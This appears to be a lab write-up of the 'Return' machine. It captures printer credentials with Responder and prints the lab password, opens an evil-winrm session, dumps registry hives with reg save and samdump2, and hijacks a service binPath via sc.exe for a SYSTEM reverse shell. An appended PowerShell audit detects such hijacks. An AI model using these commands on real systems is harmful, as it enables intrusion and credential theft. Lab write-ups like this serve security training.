Return

Personal Rating: Easy

Insecure Printer Auth

There was a web server on port 80 with a printer settings page.

So I got a server address, but I could not set the password for the account here. Running Responder and giving my own address as the server address gave me the password of the svc-printer user, though: return\svc-printer:1edFg43012!!

I wanted to use evil-winrm, but I had to set some SSL settings temporarily as the box uses legacy algorithms:

[provider_sect]
default = default_sect
legacy = legacy_sect

[default_sect]
activate = 1

[legacy_sect]
activate = 1

I could get a PowerShell session with:

evil-winrm -u svc-printer -p '1edFg43012!!' -i 10.10.11.108

Windows Hashdumping

From there I could gather the system hashes:

reg save HKLM\SAM .\sam
reg save HKLM\SYSTEM .\system
reg save HKLM\SECURITY .\security

Then I could dump them with samdump2 -o outfile system sam

However, the Administrator hash was the null hash and I could not log in with it.

Service Hijack

With net user svc-printer I could find out that the user was part of the Server Operators group. With services I also listed the running services. Abusing the rights I have with that group, I could set the path for a service that runs as SYSTEM to any folder and place a reverse shell there.

sc.exe config VMTools binPath= "C:/Users/svc-printer/reverseshell.exe"

After restarting the service I got a reverse shell as Administrator.
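A defender-side check for the end state of this change, added here as an example and not part of the original write-up: it lists services that run as LocalSystem from a binary outside the usual install directories. The trusted-root list and the helper name Get-ServiceExecutable are assumptions to adapt per environment.

```powershell
# Added example: audit LocalSystem services whose binary lives outside
# the expected install locations (e.g. under a user profile).
# Assumption: these roots are where legitimate service binaries live.
$trustedRoots = @(
    $env:SystemRoot,
    $env:ProgramFiles,
    ${env:ProgramFiles(x86)},
    (Join-Path $env:ProgramData 'Microsoft')
) | Where-Object { $_ }

# Hypothetical helper: pull the executable out of a service command line.
function Get-ServiceExecutable {
    param([string]$PathName)
    # Quoted form:   "C:\dir\app.exe" -arg
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted form: C:\dir\app.exe -arg (path may contain spaces)
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
    # Fallback: first whitespace-delimited token
    return ($PathName.Trim() -split '\s+')[0]
}

$findings = Get-CimInstance -ClassName Win32_Service |
    Where-Object {
        $_.PathName -and
        ($_.StartName -in @('LocalSystem', 'NT AUTHORITY\SYSTEM'))
    } |
    ForEach-Object {
        # Normalise forward slashes and expand %VAR% before comparing.
        $exe = (Get-ServiceExecutable $_.PathName) -replace '/', '\'
        $exe = [Environment]::ExpandEnvironmentVariables($exe)

        $trusted = $false
        foreach ($root in $trustedRoots) {
            $prefix = $root.TrimEnd('\') + '\'
            if ($exe.StartsWith($prefix, [System.StringComparison]::OrdinalIgnoreCase)) {
                $trusted = $true
                break
            }
        }
        if (-not $trusted) {
            [pscustomobject]@{
                Name = $_.Name; State = $_.State
                Executable = $exe; PathName = $_.PathName
            }
        }
    }

$findings | Format-Table -AutoSize -Wrap
```

Any row it returns is a SYSTEM service pointing at a non-standard path and is worth comparing against the vendor's default ImagePath.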
